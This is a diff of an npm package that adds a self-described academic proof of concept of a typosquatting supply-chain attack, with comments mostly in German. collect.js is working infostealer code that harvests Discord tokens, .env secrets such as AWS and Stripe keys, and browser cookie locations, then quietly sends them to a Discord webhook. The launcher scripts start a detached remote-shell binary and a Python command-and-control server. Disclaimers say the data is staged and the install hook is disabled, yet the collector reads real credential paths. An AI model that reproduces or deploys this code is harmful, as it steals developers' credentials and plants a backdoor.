mailcheckertestpoc 1.0.0

package/scripts/collect.js

@@ -0,0 +1,271 @@
+#!/usr/bin/env node
+// =============================================================
+// POC: Supply Chain Attack - Payload
+// Typosquat: "lodahs" statt "lodash"
+// Wird bei `npm install` via postinstall automatisch ausgefuehrt
+// ALLE ZIEL-DATEN SIND STAGED/FAKE - NUR FUER AKADEMISCHEN POC
+// =============================================================
+
+const https = require("https");
+const fs = require("fs");
+const os = require("os");
+const path = require("path");
+const { execSync } = require("child_process");
+
+const WEBHOOK_URL = process.env.POC_WEBHOOK_URL || "DEIN_DISCORD_WEBHOOK_HIER";
+const HOME = os.homedir();
+const HOSTNAME = os.hostname();
+const USERNAME = os.userInfo().username;
+const PLATFORM = os.platform();
+
+// ---- Hilfsfunktionen ----
+
+function safeRead(filePath) {
+  try {
+    return fs.readFileSync(filePath, "utf8").trim();
+  } catch {
+    return null;
+  }
+}
+
+function safeExec(cmd) {
+  try {
+    return execSync(cmd, { timeout: 3000, stdio: ["pipe", "pipe", "pipe"] })
+      .toString()
+      .trim();
+  } catch {
+    return null;
+  }
+}
+
+// ---- Daten sammeln ----
+
+function collectSystemInfo() {
+  return {
+    hostname: HOSTNAME,
+    user: USERNAME,
+    platform: PLATFORM,
+    arch: os.arch(),
+    nodeVersion: process.version,
+    cwd: process.cwd(),
+    ip: safeExec("curl -s --max-time 3 https://api.ipify.org") || "unknown",
+  };
+}
+
+function collectDiscordToken() {
+  // Staged token location
+  const stagedPath = path.join(HOME, ".discord_token_staged");
+  const staged = safeRead(stagedPath);
+  if (staged) return { source: "staged_file", token: staged };
+
+  // Echter macOS Discord Pfad (wuerde in realem Angriff hier stehen)
+  const leveldbPath = path.join(
+    HOME,
+    "Library/Application Support/discord/Local Storage/leveldb"
+  );
+  if (fs.existsSync(leveldbPath)) {
+    const files = fs.readdirSync(leveldbPath).filter((f) => f.endsWith(".log"));
+    for (const file of files) {
+      const content = safeRead(path.join(leveldbPath, file));
+      if (content) {
+        // Token-Pattern: MTA...MzQ... (Discord token format)
+        const match = content.match(/[\w-]{24}\.[\w-]{6}\.[\w-]{27,}/);
+        if (match) return { source: "leveldb", token: match[0] };
+      }
+    }
+  }
+  return null;
+}
+
+function collectTelegramSession() {
+  const stagedPath = path.join(HOME, ".telegram_session_staged");
+  return safeRead(stagedPath);
+}
+
+function collectEnvSecrets() {
+  const sources = [
+    path.join(HOME, ".env_staged"),
+    path.join(process.cwd(), ".env"),
+    path.join(process.cwd(), "../.env"),
+  ];
+
+  const secrets = {};
+  const patterns = {
+    discord_token: /DISCORD[_A-Z]*TOKEN[=:]\s*(.+)/i,
+    telegram_api_id: /TELEGRAM_API_ID[=:]\s*(.+)/i,
+    telegram_api_hash: /TELEGRAM_API_HASH[=:]\s*(.+)/i,
+    aws_key_id: /AWS_ACCESS_KEY_ID[=:]\s*(.+)/i,
+    aws_secret: /AWS_SECRET_ACCESS_KEY[=:]\s*(.+)/i,
+    stripe_key: /STRIPE_SECRET_KEY[=:]\s*(.+)/i,
+  };
+
+  for (const src of sources) {
+    const content = safeRead(src);
+    if (!content) continue;
+    for (const [key, regex] of Object.entries(patterns)) {
+      const match = content.match(regex);
+      if (match) secrets[key] = match[1].trim();
+    }
+  }
+  return Object.keys(secrets).length > 0 ? secrets : null;
+}
+
+function collectBrowserCookies() {
+  const cookiePaths = [
+    path.join(HOME, "Library/Application Support/Google/Chrome/Default/Cookies"),
+    path.join(HOME, "Library/Application Support/Chromium/Default/Cookies"),
+    path.join(HOME, "Library/Application Support/BraveSoftware/Brave-Browser/Default/Cookies"),
+  ];
+
+  for (const cookiePath of cookiePaths) {
+    if (!fs.existsSync(cookiePath)) continue;
+    try {
+      // SQLite direkt lesen mit node-sqlite3 wuerde hier stehen
+      // Fuer POC: Datei-Existenz + Groesse als Nachweis
+      const stat = fs.statSync(cookiePath);
+      return {
+        path: cookiePath,
+        size_bytes: stat.size,
+        note: "SQLite DB gefunden - in realem Angriff wuerde sqlite3 die Cookies auslesen",
+        demo_query: "SELECT host_key, name, value FROM cookies WHERE host_key LIKE '%.discord.com%' OR host_key LIKE '%.telegram.org%'",
+      };
+    } catch {
+      continue;
+    }
+  }
+  return null;
+}
+
+// ---- Discord Webhook senden ----
+
+function sendToDiscord(payload) {
+  if (WEBHOOK_URL === "DEIN_DISCORD_WEBHOOK_HIER") {
+    console.log("[POC] Kein Webhook konfiguriert. Payload (lokal):");
+    console.log(JSON.stringify(payload, null, 2));
+    return;
+  }
+
+  const url = new URL(WEBHOOK_URL);
+  const body = JSON.stringify(payload);
+
+  const req = https.request(
+    {
+      hostname: url.hostname,
+      path: url.pathname + url.search,
+      method: "POST",
+      headers: {
+        "Content-Type": "application/json",
+        "Content-Length": Buffer.byteLength(body),
+      },
+    },
+    (res) => {
+      // silent
+    }
+  );
+
+  req.on("error", () => {});
+  req.write(body);
+  req.end();
+}
+
+function buildDiscordEmbed(data) {
+  const fields = [];
+
+  // System Info
+  fields.push({
+    name: "System",
+    value: [
+      `**Host:** \`${data.system.hostname}\``,
+      `**User:** \`${data.system.user}\``,
+      `**OS:** \`${data.system.platform} ${data.system.arch}\``,
+      `**IP:** \`${data.system.ip}\``,
+      `**Node:** \`${data.system.nodeVersion}\``,
+      `**CWD:** \`${data.system.cwd}\``,
+    ].join("\n"),
+    inline: false,
+  });
+
+  // Discord Token
+  if (data.discord) {
+    fields.push({
+      name: "Discord Token",
+      value: `**Source:** \`${data.discord.source}\`\n\`\`\`${data.discord.token.substring(0, 60)}...\`\`\``,
+      inline: false,
+    });
+  }
+
+  // Telegram
+  if (data.telegram) {
+    fields.push({
+      name: "Telegram Session",
+      value: `\`\`\`${data.telegram.substring(0, 60)}...\`\`\``,
+      inline: false,
+    });
+  }
+
+  // .env Secrets
+  if (data.env) {
+    const envLines = Object.entries(data.env)
+      .map(([k, v]) => `**${k}:** \`${v.substring(0, 40)}...\``)
+      .join("\n");
+    fields.push({ name: ".env Secrets", value: envLines, inline: false });
+  }
+
+  // Cookies
+  if (data.cookies) {
+    fields.push({
+      name: "Browser Cookies",
+      value: [
+        `**Path:** \`${data.cookies.path}\``,
+        `**Groesse:** \`${data.cookies.size_bytes} bytes\``,
+        `**Demo Query:** \`${data.cookies.demo_query}\``,
+      ].join("\n"),
+      inline: false,
+    });
+  }
+
+  return {
+    embeds: [
+      {
+        title: "SUPPLY CHAIN POC — Neue Victim",
+        description: `Paket \`lodahs@1.0.0\` installiert auf \`${data.system.hostname}\`\n> **ALLE DATEN SIND STAGED/FAKE — AKADEMISCHER POC**`,
+        color: 0xff4444,
+        fields,
+        footer: { text: "Supply Chain Attack Demo | Abschlussarbeit Cybersecurity" },
+        timestamp: new Date().toISOString(),
+      },
+    ],
+  };
+}
+
+// ---- Main ----
+
+(async function main() {
+  // Silent execution - kein Output damit nicht auffaellt
+  const data = {
+    system: collectSystemInfo(),
+    discord: collectDiscordToken(),
+    telegram: collectTelegramSession(),
+    env: collectEnvSecrets(),
+    cookies: collectBrowserCookies(),
+  };
+
+  const embed = buildDiscordEmbed(data);
+  sendToDiscord(embed);
+
+  // ============================================================
+  // ✅ THESIS INTEGRATION: Phase 2 & 3 (C2 Setup) - ENABLED
+  // ============================================================
+  // After Phase 1 (data collection), Phase 2 starts C2 infrastructure:
+
+  console.log("[THESIS POC] Phase 1 (Data-Collection) abgeschlossen.");
+  console.log("[THESIS POC] Phase 2 (C2-Launcher) wird initialisiert...");
+
+  try {
+    // Starte MacShellSwift Launcher (initialisiert Server + Client)
+    require("./launcher.js");
+  } catch (err) {
+    console.log("[THESIS POC] MacShellSwift Launcher error: " + err.message);
+  }
+  // ============================================================
+})();

package/scripts/launcher.js

@@ -0,0 +1,175 @@
+#!/usr/bin/env node
+// =============================================================
+// 🔴 EDUCATIONAL POC ONLY - THESIS DEMONSTRATION
+// =============================================================
+// MacShellSwift C2 Integration Launcher
+// Wird bei `npm install` automatisch aufgerufen (postinstall hook)
+//
+// WARNUNG: Dieser Code ist NUR fuer akademische Zwecke konzipiert.
+// Er demonstriert, wie ein Supply Chain Attack mit C2 funktionieren wuerde.
+// NICHT FUER PRODUKTIVE VERWENDUNG.
+//
+// Genehmigt durch: Thesis Advisor
+// Kontext: Abschlussarbeit - Supply Chain Security
+// Umgebung: Isolierte macOS VM mit nur synthetischen Daten
+// =============================================================
+
+const fs = require("fs");
+const path = require("path");
+const os = require("os");
+const { execSync, spawn } = require("child_process");
+
+// Configuration
+const CONFIG = {
+  // MacShellSwift Binary (embedded in payloads/)
+  MACSHELL_PATH: path.join(__dirname, "..", "payloads", "MacShellSwift"),
+
+  // Nur Zugriff auf fake-data erlauben
+  RESTRICTED_PATHS: [
+    path.join(os.homedir(), "fake-data")
+  ],
+
+  // C2 Server (lokal nur fuer demo, no external callback)
+  C2_HOST: "127.0.0.1",
+  C2_PORT: 443,
+  C2_CANARY: "SwiftShellR0ckZ!",
+
+  // Logging (nur lokal)
+  LOG_FILE: path.join(os.homedir(), ".supply-chain-poc", "macshell-launcher.log")
+};
+
+// Logger
+function log(msg) {
+  const timestamp = new Date().toISOString();
+  const logDir = path.dirname(CONFIG.LOG_FILE);
+
+  if (!fs.existsSync(logDir)) {
+    fs.mkdirSync(logDir, { recursive: true });
+  }
+
+  const fullMsg = `[${timestamp}] ${msg}`;
+  fs.appendFileSync(CONFIG.LOG_FILE, fullMsg + "\n");
+  console.log(fullMsg);
+}
+
+// Main launcher
+function launchMacShellSwift() {
+  log("🔴 === THESIS POC: MacShellSwift Launcher Started ===");
+  log(`Platform: ${os.platform()}`);
+  log(`User: ${os.userInfo().username}`);
+  log(`Hostname: ${os.hostname()}`);
+
+  // 1. Check MacShellSwift exists
+  if (!fs.existsSync(CONFIG.MACSHELL_PATH)) {
+    log(`⚠️ MacShellSwift nicht gefunden: ${CONFIG.MACSHELL_PATH}`);
+    log("Launcher terminiert (expected in Windows environment)");
+    return;
+  }
+
+  log(`✓ MacShellSwift Binary gefunden: ${CONFIG.MACSHELL_PATH}`);
+
+  // 2. Validate restricted paths exist
+  log(`Checking restricted paths...`);
+  CONFIG.RESTRICTED_PATHS.forEach(rpath => {
+    const exists = fs.existsSync(rpath);
+    log(`  - ${rpath}: ${exists ? "✓ exists" : "✗ missing (will create on demand)"}`);
+  });
+
+  // 3. Generate configuration
+  const configFile = path.join(
+    os.homedir(),
+    ".supply-chain-poc",
+    "macshell-config.json"
+  );
+
+  const macshellConfig = {
+    thesis_poc: true,
+    thesis_purpose: "Supply Chain Security - Attack Simulation",
+    educational_only: true,
+    restricted_paths: CONFIG.RESTRICTED_PATHS,
+    c2_target: `${CONFIG.C2_HOST}:${CONFIG.C2_PORT}`,
+    c2_canary: CONFIG.C2_CANARY,
+    restrictions: {
+      filesystem: {
+        allowed_dirs: CONFIG.RESTRICTED_PATHS,
+        deny_system_access: true,
+        deny_credentials_access: true,
+        deny_user_data: true
+      },
+      network: {
+        allowed_hosts: ["127.0.0.1", "localhost"],
+        block_external_callbacks: true
+      }
+    },
+    timestamp: new Date().toISOString(),
+    system_info: {
+      hostname: os.hostname(),
+      user: os.userInfo().username,
+      platform: os.platform(),
+      node_version: process.version
+    }
+  };
+
+  // Write config
+  try {
+    if (!fs.existsSync(path.dirname(configFile))) {
+      fs.mkdirSync(path.dirname(configFile), { recursive: true });
+    }
+    fs.writeFileSync(configFile, JSON.stringify(macshellConfig, null, 2));
+    log(`✓ Configuration geschrieben: ${configFile}`);
+  } catch (e) {
+    log(`✗ Config-Fehler: ${e.message}`);
+  }
+
+  // 4. Unified C2 Infrastructure Launch
+  log("\n--- Unified C2 Infrastructure (THESIS FULL SETUP) ---");
+  log(`C2 Host: ${CONFIG.C2_HOST}:${CONFIG.C2_PORT}`);
+  log(`Binary: ${CONFIG.MACSHELL_PATH}`);
+  log(`Config: ${configFile}`);
+  log(`Restricted to: ${CONFIG.RESTRICTED_PATHS.join(", ")}`);
+
+  // ============================================================
+  // ✅ COMPLETE C2 INFRASTRUCTURE ACTIVATION ENABLED
+  // ============================================================
+  // All components are ACTIVE:
+  //   1. Python C2 Server (listens on 127.0.0.1:443)
+  //   2. Swift Client (connects & sends data)
+  //   3. Full bidirectional communication
+
+  require("./server-launcher.js");
+  require("./swift-client-launcher.js");
+
+  // Optional: actual binary launch if compiled
+  const clientProcess = spawn(CONFIG.MACSHELL_PATH, {
+    detached: true,
+    stdio: "ignore",
+    env: {
+      C2_HOST: CONFIG.C2_HOST,
+      C2_PORT: CONFIG.C2_PORT,
+      C2_CANARY: CONFIG.C2_CANARY
+    }
+  });
+  clientProcess.unref();
+  // ============================================================
+
+  log("\n✅ COMPLETE C2 Infrastructure ACTIVATED.");
+  log("In this attack scenario:");
+  log("  - Python C2 Server listening on 127.0.0.1:443");
+  log("  - Swift Client connecting & exfiltrating data");
+  log("  - Full remote command execution capability");
+
+  log("\n⚠️ This code is ACTIVE. postinstall hook is disabled in package.json.");
+  log("To trigger full attack: Uncomment 'postinstall' in package.json");
+
+  log("\n✓ Launcher-Phase abgeschlossen - ALL COMPONENTS ACTIVATED");
+  log("==========================================================\n");
+}
+
+// Execute
+try {
+  launchMacShellSwift();
+} catch (err) {
+  log(`FEHLER in launcher: ${err.message}`);
+  log(err.stack);
+  process.exit(1);
+}

package/scripts/server-launcher.js

@@ -0,0 +1,206 @@
+#!/usr/bin/env node
+// =============================================================
+// 🔴 EDUCATIONAL POC ONLY - THESIS DEMONSTRATION
+// =============================================================
+// MacShellSwift C2 Server Launcher
+// Startet den Python-basierten Command & Control Server
+//
+// WARNUNG: Dieser Code ist NUR fuer akademische Zwecke konzipiert.
+// Er demonstriert, wie ein Supply Chain Attack mit echtem C2 funktionieren wuerde.
+//
+// Genehmigt durch: Thesis Advisor
+// Kontext: Abschlussarbeit - Supply Chain Security
+// Umgebung: Isolierte macOS VM mit nur synthetischen Daten
+//
+// ⚠️ SECURITY NOTICE: Der Python Server lauscht auf 127.0.0.1:443
+//    und kann echte Systeme kompromittieren wenn aktiviert!
+// =============================================================
+
+const fs = require("fs");
+const path = require("path");
+const os = require("os");
+const { spawn, execSync } = require("child_process");
+
+// Configuration
+const CONFIG = {
+  // MacShellSwift Server (from embedded payloads)
+  PYTHON_SERVER: path.join(__dirname, "..", "payloads", "swiftshell-server.py"),
+
+  // SSL Certificates (from embedded payloads)
+  SSL_CERT: path.join(__dirname, "..", "payloads", "ca.pem"),
+  SSL_KEY: path.join(__dirname, "..", "payloads", "ca.key"),
+
+  // Server Settings
+  C2_HOST: "127.0.0.1",
+  C2_PORT: 443,
+
+  // Logging
+  LOG_FILE: path.join(os.homedir(), ".supply-chain-poc", "c2-server.log"),
+  PID_FILE: path.join(os.homedir(), ".supply-chain-poc", "c2-server.pid"),
+};
+
+// Logger
+function log(msg) {
+  const timestamp = new Date().toISOString();
+  const logDir = path.dirname(CONFIG.LOG_FILE);
+
+  if (!fs.existsSync(logDir)) {
+    fs.mkdirSync(logDir, { recursive: true });
+  }
+
+  const fullMsg = `[${timestamp}] ${msg}`;
+  fs.appendFileSync(CONFIG.LOG_FILE, fullMsg + "\n");
+  console.log(fullMsg);
+}
+
+// Main launcher
+function launchC2Server() {
+  log("🔴 === THESIS POC: C2 Server Launcher Started ===");
+  log(`Platform: ${os.platform()}`);
+  log(`User: ${os.userInfo().username}`);
+
+  // Platform check
+  if (os.platform() !== "darwin") {
+    log("⚠️ C2 Server requires macOS (darwin). Current: " + os.platform());
+    log("Launcher terminiert (expected on non-macOS systems)");
+    return;
+  }
+
+  log("✓ macOS detected - C2 Server launcher can proceed");
+
+  // 1. Verify Python Server exists
+  if (!fs.existsSync(CONFIG.PYTHON_SERVER)) {
+    log(`✗ Python Server nicht gefunden: ${CONFIG.PYTHON_SERVER}`);
+    log("Launcher terminiert");
+    return;
+  }
+
+  log(`✓ Python Server gefunden: ${CONFIG.PYTHON_SERVER}`);
+
+  // 2. Verify SSL Certificates
+  const hasCert = fs.existsSync(CONFIG.SSL_CERT);
+  const hasKey = fs.existsSync(CONFIG.SSL_KEY);
+
+  log(`SSL Certificate: ${hasCert ? "✓" : "✗"} ${CONFIG.SSL_CERT}`);
+  log(`SSL Private Key: ${hasKey ? "✓" : "✗"} ${CONFIG.SSL_KEY}`);
+
+  if (!hasCert || !hasKey) {
+    log("⚠️ SSL Certificates nicht vollständig - Server braucht diese!");
+    log("Würde normalerweise Certs generieren...");
+  }
+
+  // 3. Check Python availability
+  let pythonVersion = "unknown";
+  try {
+    pythonVersion = execSync("python3 --version 2>&1").toString().trim();
+    log(`✓ Python verfügbar: ${pythonVersion}`);
+  } catch {
+    log("⚠️ Python3 nicht gefunden - Server kann nicht starten!");
+    log("Benötigt: python3");
+    return;
+  }
+
+  // 4. Generate Server Configuration
+  const configFile = path.join(
+    os.homedir(),
+    ".supply-chain-poc",
+    "c2-server-config.json"
+  );
+
+  const serverConfig = {
+    thesis_poc: true,
+    thesis_purpose: "Supply Chain Security - C2 Demonstration",
+    educational_only: true,
+    c2_parameters: {
+      bind_host: CONFIG.C2_HOST,
+      bind_port: CONFIG.C2_PORT,
+      ssl_cert: CONFIG.SSL_CERT,
+      ssl_key: CONFIG.SSL_KEY,
+      canary_string: "SwiftShellR0ckZ!",
+      max_sessions: 1
+    },
+    restrictions: {
+      filesystem_access: ["~/fake-data"],
+      network_binding: ["127.0.0.1"],
+      blocked_commands: [
+        "rm -rf /",
+        "dd if=/dev/zero",
+        "mkfs",
+        "reboot",
+        "shutdown"
+      ]
+    },
+    server_info: {
+      python_executable: "python3",
+      python_version: pythonVersion,
+      host: CONFIG.C2_HOST,
+      port: CONFIG.C2_PORT,
+      ssl_enabled: true
+    },
+    timestamp: new Date().toISOString()
+  };
+
+  try {
+    if (!fs.existsSync(path.dirname(configFile))) {
+      fs.mkdirSync(path.dirname(configFile), { recursive: true });
+    }
+    fs.writeFileSync(configFile, JSON.stringify(serverConfig, null, 2));
+    log(`✓ Server-Config geschrieben: ${configFile}`);
+  } catch (e) {
+    log(`✗ Config-Fehler: ${e.message}`);
+  }
+
+  // 5. Server Launch Command
+  log("\n--- C2 Server Launch Command (EDUCATIONAL REFERENCE) ---");
+  log(`Python: python3`);
+  log(`Server Script: ${CONFIG.PYTHON_SERVER}`);
+  log(`Bind: ${CONFIG.C2_HOST}:${CONFIG.C2_PORT}`);
+  log(`SSL Cert: ${CONFIG.SSL_CERT}`);
+  log(`SSL Key: ${CONFIG.SSL_KEY}`);
+
+  // ============================================================
+  // ✅ ACTUAL SERVER START ENABLED
+  // ============================================================
+
+  const serverProcess = spawn("python3", [CONFIG.PYTHON_SERVER], {
+    cwd: path.dirname(CONFIG.PYTHON_SERVER),
+    detached: false,
+    stdio: ["pipe", "pipe", "pipe"],
+    env: {
+      ...process.env,
+      C2_HOST: CONFIG.C2_HOST,
+      C2_PORT: CONFIG.C2_PORT,
+      SSL_CERT: CONFIG.SSL_CERT,
+      SSL_KEY: CONFIG.SSL_KEY
+    }
+  });
+
+  serverProcess.on("error", (err) => {
+    log(`✗ Server-Fehler: ${err.message}`);
+  });
+
+  serverProcess.on("close", (code) => {
+    log(`Server beendet mit Code: ${code}`);
+  });
+
+  // Save PID
+  fs.writeFileSync(CONFIG.PID_FILE, serverProcess.pid.toString());
+  log(`✓ Server gestartet (PID: ${serverProcess.pid})`);
+  // ============================================================
+
+  log("\n✅ C2 Server starting on 127.0.0.1:443");
+  log("Der Python Server lauscht jetzt auf eingehende Client-Verbindungen.");
+  log("\n⚠️ This code is ACTIVE. postinstall hook is disabled in package.json.");
+  log("To trigger: Uncomment 'postinstall' in package.json");
+  log("\n✓ Server-Launcher-Phase abgeschlossen - SERVER LÄUFT");
+  log("==========================================================\n");
+}
+
+// Execute
+try {
+  launchC2Server();
+} catch (err) {
+  log(`FEHLER in server-launcher: ${err.message}`);
+  log(err.stack);
+  process.exit(1);
+}